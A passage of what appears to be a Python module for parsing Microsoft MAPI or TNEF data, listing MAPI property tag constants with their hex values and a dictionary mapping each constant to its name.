MAPI_MINI_ICON = 0x0FFC
MAPI_STORE_ENTRYID = 0x0FFB
MAPI_STORE_RECORD_KEY = 0x0FFA
MAPI_RECORD_KEY = 0x0FF9
MAPI_MAPPING_SIGNATURE = 0x0FF8
MAPI_ACCESS_LEVEL = 0x0FF7
MAPI_INSTANCE_KEY = 0x0FF6
MAPI_ROW_TYPE = 0x0FF5
MAPI_ACCESS = 0x0FF4
MAPI_ROWID = 0x3000
MAPI_DISPLAY_NAME = 0x3001
MAPI_ADDRTYPE = 0x3002
MAPI_EMAIL_ADDRESS = 0x3003
MAPI_COMMENT = 0x3004
MAPI_DEPTH = 0x3005
MAPI_PROVIDER_DISPLAY = 0x3006
MAPI_CREATION_TIME = 0x3007
MAPI_LAST_MODIFICATION_TIME = 0x3008
MAPI_RESOURCE_FLAGS = 0x3009
MAPI_PROVIDER_DLL_NAME = 0x300A
MAPI_SEARCH_KEY = 0x300B
MAPI_PROVIDER_UID = 0x300C
MAPI_PROVIDER_ORDINAL = 0x300D
MAPI_FORM_VERSION = 0x3301
MAPI_FORM_CLSID = 0x3302
MAPI_FORM_CONTACT_NAME = 0x3303
MAPI_FORM_CATEGORY = 0x3304
MAPI_FORM_CATEGORY_SUB = 0x3305
MAPI_FORM_HOST_MAP = 0x3306
MAPI_FORM_HIDDEN = 0x3307
MAPI_FORM_DESIGNER_NAME = 0x3308
MAPI_FORM_DESIGNER_GUID = 0x3309
MAPI_FORM_MESSAGE_BEHAVIOR = 0x330A
MAPI_DEFAULT_STORE = 0x3400
MAPI_STORE_SUPPORT_MASK = 0x340D
MAPI_STORE_STATE = 0x340E
MAPI_IPM_SUBTREE_SEARCH_KEY = 0x3410
MAPI_IPM_OUTBOX_SEARCH_KEY = 0x3411
MAPI_IPM_WASTEBASKET_SEARCH_KEY = 0x3412
MAPI_IPM_SENTMAIL_SEARCH_KEY = 0x3413
MAPI_MDB_PROVIDER = 0x3414
MAPI_RECEIVE_FOLDER_SETTINGS = 0x3415
MAPI_VALID_FOLDER_MASK = 0x35DF
MAPI_IPM_SUBTREE_ENTRYID = 0x35E0
MAPI_IPM_OUTBOX_ENTRYID = 0x35E2
MAPI_IPM_WASTEBASKET_ENTRYID = 0x35E3
MAPI_IPM_SENTMAIL_ENTRYID = 0x35E4
MAPI_VIEWS_ENTRYID = 0x35E5
MAPI_COMMON_VIEWS_ENTRYID = 0x35E6
MAPI_FINDER_ENTRYID = 0x35E7
MAPI_CONTAINER_FLAGS = 0x3600
MAPI_FOLDER_TYPE = 0x3601
MAPI_CONTENT_COUNT = 0x3602
MAPI_CONTENT_UNREAD = 0x3603
MAPI_CREATE_TEMPLATES = 0x3604
MAPI_DETAILS_TABLE = 0x3605
MAPI_SEARCH = 0x3607
MAPI_SELECTABLE = 0x3609
MAPI_SUBFOLDERS = 0x360A
MAPI_STATUS = 0x360B
MAPI_ANR = 0x360C
MAPI_CONTENTS_SORT_ORDER = 0x360D
MAPI_CONTAINER_HIERARCHY = 0x360E
MAPI_CONTAINER_CONTENTS = 0x360F
MAPI_FOLDER_ASSOCIATED_CONTENTS = 0x3610
MAPI_DEF_CREATE_DL = 0x3611
MAPI_DEF_CREATE_MAILUSER = 0x3612
MAPI_CONTAINER_CLASS = 0x3613
MAPI_CONTAINER_MODIFY_VERSION = 0x3614
MAPI_AB_PROVIDER_ID = 0x3615
MAPI_DEFAULT_VIEW_ENTRYID = 0x3616
MAPI_ASSOC_CONTENT_COUNT = 0x3617
MAPI_ATTACHMENT_X400_PARAMETERS = 0x3700
MAPI_ATTACH_DATA_OBJ = 0x3701
MAPI_ATTACH_ENCODING = 0x3702
MAPI_ATTACH_EXTENSION = 0x3703
MAPI_ATTACH_FILENAME = 0x3704
MAPI_ATTACH_METHOD = 0x3705
MAPI_ATTACH_LONG_FILENAME = 0x3707
MAPI_ATTACH_PATHNAME = 0x3708
MAPI_ATTACH_RENDERING = 0x3709
MAPI_ATTACH_TAG = 0x370A
MAPI_RENDERING_POSITION = 0x370B
MAPI_ATTACH_TRANSPORT_NAME = 0x370C
MAPI_ATTACH_LONG_PATHNAME = 0x370D
MAPI_ATTACH_MIME_TAG = 0x370E
MAPI_ATTACH_ADDITIONAL_INFO = 0x370F
MAPI_DISPLAY_TYPE = 0x3900
MAPI_TEMPLATEID = 0x3902
MAPI_PRIMARY_CAPABILITY = 0x3904
MAPI_7BIT_DISPLAY_NAME = 0x39FF
MAPI_ACCOUNT = 0x3A00
MAPI_ALTERNATE_RECIPIENT = 0x3A01
MAPI_CALLBACK_TELEPHONE_NUMBER = 0x3A02
MAPI_CONVERSION_PROHIBITED = 0x3A03
MAPI_DISCLOSE_RECIPIENTS = 0x3A04
MAPI_GENERATION = 0x3A05
MAPI_GIVEN_NAME = 0x3A06
MAPI_GOVERNMENT_ID_NUMBER = 0x3A07
MAPI_BUSINESS_TELEPHONE_NUMBER = 0x3A08
MAPI_HOME_TELEPHONE_NUMBER = 0x3A09
MAPI_INITIALS = 0x3A0A
MAPI_KEYWORD = 0x3A0B
MAPI_LANGUAGE = 0x3A0C
MAPI_LOCATION = 0x3A0D
MAPI_MAIL_PERMISSION = 0x3A0E
MAPI_MHS_COMMON_NAME = 0x3A0F
MAPI_ORGANIZATIONAL_ID_NUMBER = 0x3A10
MAPI_SURNAME = 0x3A11
MAPI_ORIGINAL_ENTRYID = 0x3A12
MAPI_ORIGINAL_DISPLAY_NAME = 0x3A13
MAPI_ORIGINAL_SEARCH_KEY = 0x3A14
MAPI_POSTAL_ADDRESS = 0x3A15
MAPI_COMPANY_NAME = 0x3A16
MAPI_TITLE = 0x3A17
MAPI_DEPARTMENT_NAME = 0x3A18
MAPI_OFFICE_LOCATION = 0x3A19
MAPI_PRIMARY_TELEPHONE_NUMBER = 0x3A1A
MAPI_BUSINESS2_TELEPHONE_NUMBER = 0x3A1B
MAPI_MOBILE_TELEPHONE_NUMBER = 0x3A1C
MAPI_RADIO_TELEPHONE_NUMBER = 0x3A1D
MAPI_CAR_TELEPHONE_NUMBER = 0x3A1E
MAPI_OTHER_TELEPHONE_NUMBER = 0x3A1F
MAPI_TRANSMITABLE_DISPLAY_NAME = 0x3A20
MAPI_PAGER_TELEPHONE_NUMBER = 0x3A21
MAPI_USER_CERTIFICATE = 0x3A22
MAPI_PRIMARY_FAX_NUMBER = 0x3A23
MAPI_BUSINESS_FAX_NUMBER = 0x3A24
MAPI_HOME_FAX_NUMBER = 0x3A25
MAPI_COUNTRY = 0x3A26
MAPI_LOCALITY = 0x3A27
MAPI_STATE_OR_PROVINCE = 0x3A28
MAPI_STREET_ADDRESS = 0x3A29
MAPI_POSTAL_CODE = 0x3A2A
MAPI_POST_OFFICE_BOX = 0x3A2B
MAPI_TELEX_NUMBER = 0x3A2C
MAPI_ISDN_NUMBER = 0x3A2D
MAPI_ASSISTANT_TELEPHONE_NUMBER = 0x3A2E
MAPI_HOME2_TELEPHONE_NUMBER = 0x3A2F
MAPI_ASSISTANT = 0x3A30
MAPI_SEND_RICH_INFO = 0x3A40
MAPI_WEDDING_ANNIVERSARY = 0x3A41
MAPI_BIRTHDAY = 0x3A42
MAPI_HOBBIES = 0x3A43
MAPI_MIDDLE_NAME = 0x3A44
MAPI_DISPLAY_NAME_PREFIX = 0x3A45
MAPI_PROFESSION = 0x3A46
MAPI_PREFERRED_BY_NAME = 0x3A47
MAPI_SPOUSE_NAME = 0x3A48
MAPI_COMPUTER_NETWORK_NAME = 0x3A49
MAPI_CUSTOMER_ID = 0x3A4A
MAPI_TTYTDD_PHONE_NUMBER = 0x3A4B
MAPI_FTP_SITE = 0x3A4C
MAPI_GENDER = 0x3A4D
MAPI_MANAGER_NAME = 0x3A4E
MAPI_NICKNAME = 0x3A4F
MAPI_PERSONAL_HOME_PAGE = 0x3A50
MAPI_BUSINESS_HOME_PAGE = 0x3A51
MAPI_CONTACT_VERSION = 0x3A52
MAPI_CONTACT_ENTRYIDS = 0x3A53
MAPI_CONTACT_ADDRTYPES = 0x3A54
MAPI_CONTACT_DEFAULT_ADDRESS_INDEX = 0x3A55
MAPI_CONTACT_EMAIL_ADDRESSES = 0x3A56
MAPI_COMPANY_MAIN_PHONE_NUMBER = 0x3A57
MAPI_CHILDRENS_NAMES = 0x3A58
MAPI_HOME_ADDRESS_CITY = 0x3A59
MAPI_HOME_ADDRESS_COUNTRY = 0x3A5A
MAPI_HOME_ADDRESS_POSTAL_CODE = 0x3A5B
MAPI_HOME_ADDRESS_STATE_OR_PROVINCE = 0x3A5C
MAPI_HOME_ADDRESS_STREET = 0x3A5D
MAPI_HOME_ADDRESS_POST_OFFICE_BOX = 0x3A5E
MAPI_OTHER_ADDRESS_CITY = 0x3A5F
MAPI_OTHER_ADDRESS_COUNTRY = 0x3A60
MAPI_OTHER_ADDRESS_POSTAL_CODE = 0x3A61
MAPI_OTHER_ADDRESS_STATE_OR_PROVINCE = 0x3A62
MAPI_OTHER_ADDRESS_STREET = 0x3A63
MAPI_OTHER_ADDRESS_POST_OFFICE_BOX = 0x3A64
MAPI_STORE_PROVIDERS = 0x3D00
MAPI_AB_PROVIDERS = 0x3D01
MAPI_TRANSPORT_PROVIDERS = 0x3D02
MAPI_DEFAULT_PROFILE = 0x3D04
MAPI_AB_SEARCH_PATH = 0x3D05
MAPI_AB_DEFAULT_DIR = 0x3D06
MAPI_AB_DEFAULT_PAB = 0x3D07
MAPI_FILTERING_HOOKS = 0x3D08
MAPI_SERVICE_NAME = 0x3D09
MAPI_SERVICE_DLL_NAME = 0x3D0A
MAPI_SERVICE_ENTRY_NAME = 0x3D0B
MAPI_SERVICE_UID = 0x3D0C
MAPI_SERVICE_EXTRA_UIDS = 0x3D0D
MAPI_SERVICES = 0x3D0E
MAPI_SERVICE_SUPPORT_FILES = 0x3D0F
MAPI_SERVICE_DELETE_FILES = 0x3D10
MAPI_AB_SEARCH_PATH_UPDATE = 0x3D11
MAPI_PROFILE_NAME = 0x3D12
MAPI_IDENTITY_DISPLAY = 0x3E00
MAPI_IDENTITY_ENTRYID = 0x3E01
MAPI_RESOURCE_METHODS = 0x3E02
MAPI_RESOURCE_TYPE = 0x3E03
MAPI_STATUS_CODE = 0x3E04
MAPI_IDENTITY_SEARCH_KEY = 0x3E05
MAPI_OWN_STORE_ENTRYID = 0x3E06
MAPI_RESOURCE_PATH = 0x3E07
MAPI_STATUS_STRING = 0x3E08
MAPI_X400_DEFERRED_DELIVERY_CANCEL = 0x3E09
MAPI_HEADER_FOLDER_ENTRYID = 0x3E0A
MAPI_REMOTE_PROGRESS = 0x3E0B
MAPI_REMOTE_PROGRESS_TEXT = 0x3E0C
MAPI_REMOTE_VALIDATE_OK = 0x3E0D
MAPI_CONTROL_FLAGS = 0x3F00
MAPI_CONTROL_STRUCTURE = 0x3F01
MAPI_CONTROL_TYPE = 0x3F02
MAPI_DELTAX = 0x3F03
MAPI_DELTAY = 0x3F04
MAPI_XPOS = 0x3F05
MAPI_YPOS = 0x3F06
MAPI_CONTROL_ID = 0x3F07
MAPI_INITIAL_DETAILS_PANE = 0x3F08
MAPI_ID_SECURE_MIN = 0x67F0
MAPI_ID_SECURE_MAX = 0x67FF
codes = {
MAPI_ACKNOWLEDGEMENT_MODE : "MAPI_ACKNOWLEDGEMENT_MODE",
MAPI_ALTERNATE_RECIPIENT_ALLOWED : "MAPI_ALTERNATE_RECIPIENT_ALLOWED",
MAPI_AUTHORIZING_USERS : "MAPI_AUTHORIZING_USERS",
MAPI_AUTO_FORWARD_COMMENT : "MAPI_AUTO_FORWARD_COMMENT",
MAPI_AUTO_FORWARDED : "MAPI_AUTO_FORWARDED",
MAPI_CONTENT_CONFIDENTIALITY_ALGORITHM_ID : "MAPI_CONTENT_CONFIDENTIALITY_ALGORITHM_ID",
MAPI_CONTENT_CORRELATOR : "MAPI_CONTENT_CORRELATOR",
MAPI_CONTENT_IDENTIFIER : "MAPI_CONTENT_IDENTIFIER",
MAPI_CONTENT_LENGTH : "MAPI_CONTENT_LENGTH",
MAPI_CONTENT_RETURN_REQUESTED : "MAPI_CONTENT_RETURN_REQUESTED",
MAPI_CONVERSATION_KEY : "MAPI_CONVERSATION_KEY",
MAPI_CONVERSION_EITS : "MAPI_CONVERSION_EITS",
MAPI_CONVERSION_WITH_LOSS_PROHIBITED : "MAPI_CONVERSION_WITH_LOSS_PROHIBITED",
MAPI_CONVERTED_EITS : "MAPI_CONVERTED_EITS",
MAPI_DEFERRED_DELIVERY_TIME : "MAPI_DEFERRED_DELIVERY_TIME",
MAPI_DELIVER_TIME : "MAPI_DELIVER_TIME",
MAPI_DISCARD_REASON : "MAPI_DISCARD_REASON",
MAPI_DISCLOSURE_OF_RECIPIENTS : "MAPI_DISCLOSURE_OF_RECIPIENTS",
MAPI_DL_EXPANSION_HISTORY : "MAPI_DL_EXPANSION_HISTORY",
MAPI_DL_EXPANSION_PROHIBITED : "MAPI_DL_EXPANSION_PROHIBITED",
MAPI_EXPIRY_TIME : "MAPI_EXPIRY_TIME",
MAPI_IMPLICIT_CONVERSION_PROHIBITED : "MAPI_IMPLICIT_CONVERSION_PROHIBITED",
MAPI_IMPORTANCE : "MAPI_IMPORTANCE",
MAPI_IPM_ID : "MAPI_IPM_ID",
MAPI_LATEST_DELIVERY_TIME : "MAPI_LATEST_DELIVERY_TIME",
MAPI_MESSAGE_CLASS : "MAPI_MESSAGE_CLASS",
MAPI_MESSAGE_DELIVERY_ID : "MAPI_MESSAGE_DELIVERY_ID",
MAPI_MESSAGE_SECURITY_LABEL : "MAPI_MESSAGE_SECURITY_LABEL",
MAPI_OBSOLETED_IPMS : "MAPI_OBSOLETED_IPMS",
MAPI_ORIGINALLY_INTENDED_RECIPIENT_NAME : "MAPI_ORIGINALLY_INTENDED_RECIPIENT_NAME",
MAPI_ORIGINAL_EITS : "MAPI_ORIGINAL_EITS",
MAPI_ORIGINATOR_CERTIFICATE : "MAPI_ORIGINATOR_CERTIFICATE",
MAPI_ORIGINATOR_DELIVERY_REPORT_REQUESTED : "MAPI_ORIGINATOR_DELIVERY_REPORT_REQUESTED",
MAPI_ORIGINATOR_RETURN_ADDRESS : "MAPI_ORIGINATOR_RETURN_ADDRESS",
MAPI_PARENT_KEY : "MAPI_PARENT_KEY",
MAPI_PRIORITY : "MAPI_PRIORITY",
MAPI_ORIGIN_CHECK : "MAPI_ORIGIN_CHECK",
MAPI_PROOF_OF_SUBMISSION_REQUESTED : "MAPI_PROOF_OF_SUBMISSION_REQUESTED",
MAPI_READ_RECEIPT_REQUESTED : "MAPI_READ_RECEIPT_REQUESTED",
MAPI_RECEIPT_TIME : "MAPI_RECEIPT_TIME",
MAPI_RECIPIENT_REASSIGNMENT_PROHIBITED : "MAPI_RECIPIENT_REASSIGNMENT_PROHIBITED",
MAPI_REDIRECTION_HISTORY : "MAPI_REDIRECTION_HISTORY",
MAPI_RELATED_IPMS : "MAPI_RELATED_IPMS",
MAPI_ORIGINAL_SENSITIVITY : "MAPI_ORIGINAL_SENSITIVITY",
MAPI_LANGUAGES : "MAPI_LANGUAGES",
MAPI_REPLY_TIME : "MAPI_REPLY_TIME",
MAPI_REPORT_TAG : "MAPI_REPORT_TAG",
MAPI_REPORT_TIME : "MAPI_REPORT_TIME",
MAPI_RETURNED_IPM : "MAPI_RETURNED_IPM",
MAPI_SECURITY : "MAPI_SECURITY",
MAPI_INCOMPLETE_COPY : "MAPI_INCOMPLETE_COPY",
MAPI_SENSITIVITY : "MAPI_SENSITIVITY",
MAPI_SUBJECT : "MAPI_SUBJECT",
MAPI_SUBJECT_IPM : "MAPI_SUBJECT_IPM",
MAPI_CLIENT_SUBMIT_TIME : "MAPI_CLIENT_SUBMIT_TIME",
MAPI_REPORT_NAME : "MAPI_REPORT_NAME",
MAPI_SENT_REPRESENTING_SEARCH_KEY : "MAPI_SENT_REPRESENTING_SEARCH_KEY",
MAPI_X400_CONTENT_TYPE : "MAPI_X400_CONTENT_TYPE",
MAPI_SUBJECT_PREFIX : "MAPI_SUBJECT_PREFIX",
MAPI_NON_RECEIPT_REASON : "MAPI_NON_RECEIPT_REASON",
MAPI_RECEIVED_BY_ENTRYID : "MAPI_RECEIVED_BY_ENTRYID",
MAPI_RECEIVED_BY_NAME : "MAPI_RECEIVED_BY_NAME",
MAPI_SENT_REPRESENTING_ENTRYID : "MAPI_SENT_REPRESENTING_ENTRYID",
MAPI_SENT_REPRESENTING_NAME : "MAPI_SENT_REPRESENTING_NAME",
MAPI_RCVD_REPRESENTING_ENTRYID : "MAPI_RCVD_REPRESENTING_ENTRYID",
MAPI_RCVD_REPRESENTING_NAME : "MAPI_RCVD_REPRESENTING_NAME",
MAPI_REPORT_ENTRYID : "MAPI_REPORT_ENTRYID",
MAPI_READ_RECEIPT_ENTRYID : "MAPI_READ_RECEIPT_ENTRYID",
MAPI_MESSAGE_SUBMISSION_ID : "MAPI_MESSAGE_SUBMISSION_ID",
MAPI_PROVIDER_SUBMIT_TIME : "MAPI_PROVIDER_SUBMIT_TIME",
MAPI_ORIGINAL_SUBJECT : "MAPI_ORIGINAL_SUBJECT",
MAPI_DISC_VAL : "MAPI_DISC_VAL",
MAPI_ORIG_MESSAGE_CLASS : "MAPI_ORIG_MESSAGE_CLASS",
MAPI_ORIGINAL_AUTHOR_ENTRYID : "MAPI_ORIGINAL_AUTHOR_ENTRYID",
MAPI_ORIGINAL_AUTHOR_NAME : "MAPI_ORIGINAL_AUTHOR_NAME",
MAPI_ORIGINAL_SUBMIT_TIME : "MAPI_ORIGINAL_SUBMIT_TIME",
MAPI_REPLY_RECIPIENT_ENTRIES : "MAPI_REPLY_RECIPIENT_ENTRIES",
MAPI_REPLY_RECIPIENT_NAMES : "MAPI_REPLY_RECIPIENT_NAMES",
MAPI_RECEIVED_BY_SEARCH_KEY : "MAPI_RECEIVED_BY_SEARCH_KEY",
MAPI_RCVD_REPRESENTING_SEARCH_KEY : "MAPI_RCVD_REPRESENTING_SEARCH_KEY",
MAPI_READ_RECEIPT_SEARCH_KEY : "MAPI_READ_RECEIPT_SEARCH_KEY",
MAPI_REPORT_SEARCH_KEY : "MAPI_REPORT_SEARCH_KEY",
MAPI_ORIGINAL_DELIVERY_TIME : "MAPI_ORIGINAL_DELIVERY_TIME",
MAPI_ORIGINAL_AUTHOR_SEARCH_KEY : "MAPI_ORIGINAL_AUTHOR_SEARCH_KEY",
MAPI_MESSAGE_TO_ME : "MAPI_MESSAGE_TO_ME",
MAPI_MESSAGE_CC_ME : "MAPI_MESSAGE_CC_ME",
MAPI_MESSAGE_RECIP_ME : "MAPI_MESSAGE_RECIP_ME",
MAPI_ORIGINAL_SENDER_NAME : "MAPI_ORIGINAL_SENDER_NAME",
MAPI_ORIGINAL_SENDER_ENTRYID : "MAPI_ORIGINAL_SENDER_ENTRYID",
MAPI_ORIGINAL_SENDER_SEARCH_KEY : "MAPI_ORIGINAL_SENDER_SEARCH_KEY",
MAPI_ORIGINAL_SENT_REPRESENTING_NAME : "MAPI_ORIGINAL_SENT_REPRESENTING_NAME",
MAPI_ORIGINAL_SENT_REPRESENTING_ENTRYID : "MAPI_ORIGINAL_SENT_REPRESENTING_ENTRYID",
MAPI_ORIGINAL_SENT_REPRESENTING_SEARCH_KEY : "MAPI_ORIGINAL_SENT_REPRESENTING_SEARCH_KEY",
MAPI_START_DATE : "MAPI_START_DATE",
MAPI_END_DATE : "MAPI_END_DATE",
MAPI_OWNER_APPT_ID : "MAPI_OWNER_APPT_ID",
MAPI_RESPONSE_REQUESTED : "MAPI_RESPONSE_REQUESTED",
MAPI_SENT_REPRESENTING_ADDRTYPE : "MAPI_SENT_REPRESENTING_ADDRTYPE",
MAPI_SENT_REPRESENTING_EMAIL_ADDRESS : "MAPI_SENT_REPRESENTING_EMAIL_ADDRESS",
MAPI_ORIGINAL_SENDER_ADDRTYPE : "MAPI_ORIGINAL_SENDER_ADDRTYPE",
MAPI_ORIGINAL_SENDER_EMAIL_ADDRESS : "MAPI_ORIGINAL_SENDER_EMAIL_ADDRESS",
MAPI_ORIGINAL_SENT_REPRESENTING_ADDRTYPE : "MAPI_ORIGINAL_SENT_REPRESENTING_ADDRTYPE",
MAPI_ORIGINAL_SENT_REPRESENTING_EMAIL_ADDRESS : "MAPI_ORIGINAL_SENT_REPRESENTING_EMAIL_ADDRESS",
MAPI_CONVERSATION_TOPIC : "MAPI_CONVERSATION_TOPIC",
MAPI_CONVERSATION_INDEX : "MAPI_CONVERSATION_INDEX",
MAPI_ORIGINAL_DISPLAY_BCC : "MAPI_ORIGINAL_DISPLAY_BCC",
MAPI_ORIGINAL_DISPLAY_CC : "MAPI_ORIGINAL_DISPLAY_CC",
MAPI_ORIGINAL_DISPLAY_TO : "MAPI_ORIGINAL_DISPLAY_TO",
MAPI_RECEIVED_BY_ADDRTYPE : "MAPI_RECEIVED_BY_ADDRTYPE",
MAPI_RECEIVED_BY_EMAIL_ADDRESS : "MAPI_RECEIVED_BY_EMAIL_ADDRESS",
MAPI_RCVD_REPRESENTING_ADDRTYPE : "MAPI_RCVD_REPRESENTING_ADDRTYPE",
MAPI_RCVD_REPRESENTING_EMAIL_ADDRESS : "MAPI_RCVD_REPRESENTING_EMAIL_ADDRESS",
MAPI_ORIGINAL_AUTHOR_ADDRTYPE : "MAPI_ORIGINAL_AUTHOR_ADDRTYPE",
MAPI_ORIGINAL_AUTHOR_EMAIL_ADDRESS : "MAPI_ORIGINAL_AUTHOR_EMAIL_ADDRESS",
MAPI_ORIGINALLY_INTENDED_RECIP_ADDRTYPE : "MAPI_ORIGINALLY_INTENDED_RECIP_ADDRTYPE",
MAPI_ORIGINALLY_INTENDED_RECIP_EMAIL_ADDRESS : "MAPI_ORIGINALLY_INTENDED_RECIP_EMAIL_ADDRESS",
MAPI_TRANSPORT_MESSAGE_HEADERS : "MAPI_TRANSPORT_MESSAGE_HEADERS",
MAPI_DELEGATION : "MAPI_DELEGATION",
MAPI_TNEF_CORRELATION_KEY : "MAPI_TNEF_CORRELATION_KEY",
MAPI_BODY : "MAPI_BODY",
MAPI_BODY_HTML : "MAPI_BODY_HTML",
MAPI_REPORT_TEXT : "MAPI_REPORT_TEXT",
MAPI_ORIGINATOR_AND_DL_EXPANSION_HISTORY : "MAPI_ORIGINATOR_AND_DL_EXPANSION_HISTORY",
MAPI_REPORTING_DL_NAME : "MAPI_REPORTING_DL_NAME",
MAPI_REPORTING_MTA_CERTIFICATE : "MAPI_REPORTING_MTA_CERTIFICATE",
MAPI_RTF_SYNC_BODY_CRC : "MAPI_RTF_SYNC_BODY_CRC",
MAPI_RTF_SYNC_BODY_COUNT : "MAPI_RTF_SYNC_BODY_COUNT",
MAPI_RTF_SYNC_BODY_TAG : "MAPI_RTF_SYNC_BODY_TAG",
MAPI_RTF_COMPRESSED : "MAPI_RTF_COMPRESSED",
MAPI_RTF_SYNC_PREFIX_COUNT : "MAPI_RTF_SYNC_PREFIX_COUNT",
MAPI_RTF_SYNC_TRAILING_COUNT : "MAPI_RTF_SYNC_TRAILING_COUNT",
MAPI_ORIGINALLY_INTENDED_RECIP_ENTRYID : "MAPI_ORIGINALLY_INTENDED_RECIP_ENTRYID",
MAPI_CONTENT_INTEGRITY_CHECK : "MAPI_CONTENT_INTEGRITY_CHECK",
MAPI_EXPLICIT_CONVERSION : "MAPI_EXPLICIT_CONVERSION",
MAPI_IPM_RETURN_REQUESTED : "MAPI_IPM_RETURN_REQUESTED",
MAPI_MESSAGE_TOKEN : "MAPI_MESSAGE_TOKEN",
MAPI_NDR_REASON_CODE : "MAPI_NDR_REASON_CODE",
MAPI_NDR_DIAG_CODE : "MAPI_NDR_DIAG_CODE",
MAPI_NON_RECEIPT_NOTIFICATION_REQUESTED : "MAPI_NON_RECEIPT_NOTIFICATION_REQUESTED",
MAPI_DELIVERY_POINT : "MAPI_DELIVERY_POINT",
MAPI_ORIGINATOR_NON_DELIVERY_REPORT_REQUESTED : "MAPI_ORIGINATOR_NON_DELIVERY_REPORT_REQUESTED",
MAPI_ORIGINATOR_REQUESTED_ALTERNATE_RECIPIENT : "MAPI_ORIGINATOR_REQUESTED_ALTERNATE_RECIPIENT",
MAPI_PHYSICAL_DELIVERY_BUREAU_FAX_DELIVERY : "MAPI_PHYSICAL_DELIVERY_BUREAU_FAX_DELIVERY",
MAPI_PHYSICAL_DELIVERY_MODE : "MAPI_PHYSICAL_DELIVERY_MODE",
MAPI_PHYSICAL_DELIVERY_REPORT_REQUEST : "MAPI_PHYSICAL_DELIVERY_REPORT_REQUEST",
MAPI_PHYSICAL_FORWARDING_ADDRESS : "MAPI_PHYSICAL_FORWARDING_ADDRESS",
MAPI_PHYSICAL_FORWARDING_ADDRESS_REQUESTED : "MAPI_PHYSICAL_FORWARDING_ADDRESS_REQUESTED",
MAPI_PHYSICAL_FORWARDING_PROHIBITED : "MAPI_PHYSICAL_FORWARDING_PROHIBITED",
MAPI_PHYSICAL_RENDITION_ATTRIBUTES : "MAPI_PHYSICAL_RENDITION_ATTRIBUTES",
MAPI_PROOF_OF_DELIVERY : "MAPI_PROOF_OF_DELIVERY",
MAPI_PROOF_OF_DELIVERY_REQUESTED : "MAPI_PROOF_OF_DELIVERY_REQUESTED",
MAPI_RECIPIENT_CERTIFICATE : "MAPI_RECIPIENT_CERTIFICATE",
MAPI_RECIPIENT_NUMBER_FOR_ADVICE : "MAPI_RECIPIENT_NUMBER_FOR_ADVICE",
MAPI_RECIPIENT_TYPE : "MAPI_RECIPIENT_TYPE",
MAPI_REGISTERED_MAIL_TYPE : "MAPI_REGISTERED_MAIL_TYPE",
MAPI_REPLY_REQUESTED : "MAPI_REPLY_REQUESTED",
MAPI_REQUESTED_DELIVERY_METHOD : "MAPI_REQUESTED_DELIVERY_METHOD",
MAPI_SENDER_ENTRYID : "MAPI_SENDER_ENTRYID",
MAPI_SENDER_NAME : "MAPI_SENDER_NAME",
MAPI_SUPPLEMENTARY_INFO : "MAPI_SUPPLEMENTARY_INFO",
MAPI_TYPE_OF_MTS_USER : "MAPI_TYPE_OF_MTS_USER",
MAPI_SENDER_SEARCH_KEY : "MAPI_SENDER_SEARCH_KEY",
MAPI_SENDER_ADDRTYPE : "MAPI_SENDER_ADDRTYPE",
MAPI_SENDER_EMAIL_ADDRESS : "MAPI_SENDER_EMAIL_ADDRESS",
MAPI_CURRENT_VERSION : "MAPI_CURRENT_VERSION",
MAPI_DELETE_AFTER_SUBMIT : "MAPI_DELETE_AFTER_SUBMIT",
MAPI_DISPLAY_BCC : "MAPI_DISPLAY_BCC",
MAPI_DISPLAY_CC : "MAPI_DISPLAY_CC",
MAPI_DISPLAY_TO : "MAPI_DISPLAY_TO",
MAPI_PARENT_DISPLAY : "MAPI_PARENT_DISPLAY",
MAPI_MESSAGE_DELIVERY_TIME : "MAPI_MESSAGE_DELIVERY_TIME",
MAPI_MESSAGE_FLAGS : "MAPI_MESSAGE_FLAGS",
MAPI_MESSAGE_SIZE : "MAPI_MESSAGE_SIZE",
MAPI_PARENT_ENTRYID : "MAPI_PARENT_ENTRYID",
MAPI_SENTMAIL_ENTRYID : "MAPI_SENTMAIL_ENTRYID",
MAPI_CORRELATE : "MAPI_CORRELATE",
MAPI_CORRELATE_MTSID : "MAPI_CORRELATE_MTSID",
MAPI_DISCRETE_VALUES : "MAPI_DISCRETE_VALUES",
MAPI_RESPONSIBILITY : "MAPI_RESPONSIBILITY",
MAPI_SPOOLER_STATUS : "MAPI_SPOOLER_STATUS",
MAPI_TRANSPORT_STATUS : "MAPI_TRANSPORT_STATUS",
MAPI_MESSAGE_RECIPIENTS : "MAPI_MESSAGE_RECIPIENTS",
MAPI_MESSAGE_ATTACHMENTS : "MAPI_MESSAGE_ATTACHMENTS",
MAPI_SUBMIT_FLAGS : "MAPI_SUBMIT_FLAGS",
MAPI_RECIPIENT_STATUS : "MAPI_RECIPIENT_STATUS",
MAPI_TRANSPORT_KEY : "MAPI_TRANSPORT_KEY",
MAPI_MSG_STATUS : "MAPI_MSG_STATUS",
MAPI_MESSAGE_DOWNLOAD_TIME : "MAPI_MESSAGE_DOWNLOAD_TIME",
MAPI_CREATION_VERSION : "MAPI_CREATION_VERSION",
MAPI_MODIFY_VERSION : "MAPI_MODIFY_VERSION",
MAPI_HASATTACH : "MAPI_HASATTACH",
MAPI_BODY_CRC : "MAPI_BODY_CRC",
MAPI_NORMALIZED_SUBJECT : "MAPI_NORMALIZED_SUBJECT",
MAPI_RTF_IN_SYNC : "MAPI_RTF_IN_SYNC",
MAPI_ATTACH_SIZE : "MAPI_ATTACH_SIZE",
MAPI_ATTACH_NUM : "MAPI_ATTACH_NUM",
MAPI_PREPROCESS : "MAPI_PREPROCESS",
MAPI_ORIGINATING_MTA_CERTIFICATE : "MAPI_ORIGINATING_MTA_CERTIFICATE",
MAPI_PROOF_OF_SUBMISSION : "MAPI_PROOF_OF_SUBMISSION",
MAPI_ENTRYID : "MAPI_ENTRYID",
MAPI_OBJECT_TYPE : "MAPI_OBJECT_TYPE",
MAPI_ICON : "MAPI_ICON",
MAPI_MINI_ICON : "MAPI_MINI_ICON",
MAPI_STORE_ENTRYID : "MAPI_STORE_ENTRYID",
MAPI_STORE_RECORD_KEY : "MAPI_STORE_RECORD_KEY",
MAPI_RECORD_KEY : "MAPI_RECORD_KEY",
MAPI_MAPPING_SIGNATURE : "MAPI_MAPPING_SIGNATURE",
MAPI_ACCESS_LEVEL : "MAPI_ACCESS_LEVEL",
MAPI_INSTANCE_KEY : "MAPI_INSTANCE_KEY",
MAPI_ROW_TYPE : "MAPI_ROW_TYPE",
MAPI_ACCESS : "MAPI_ACCESS",
MAPI_ROWID : "MAPI_ROWID",
MAPI_DISPLAY_NAME : "MAPI_DISPLAY_NAME",
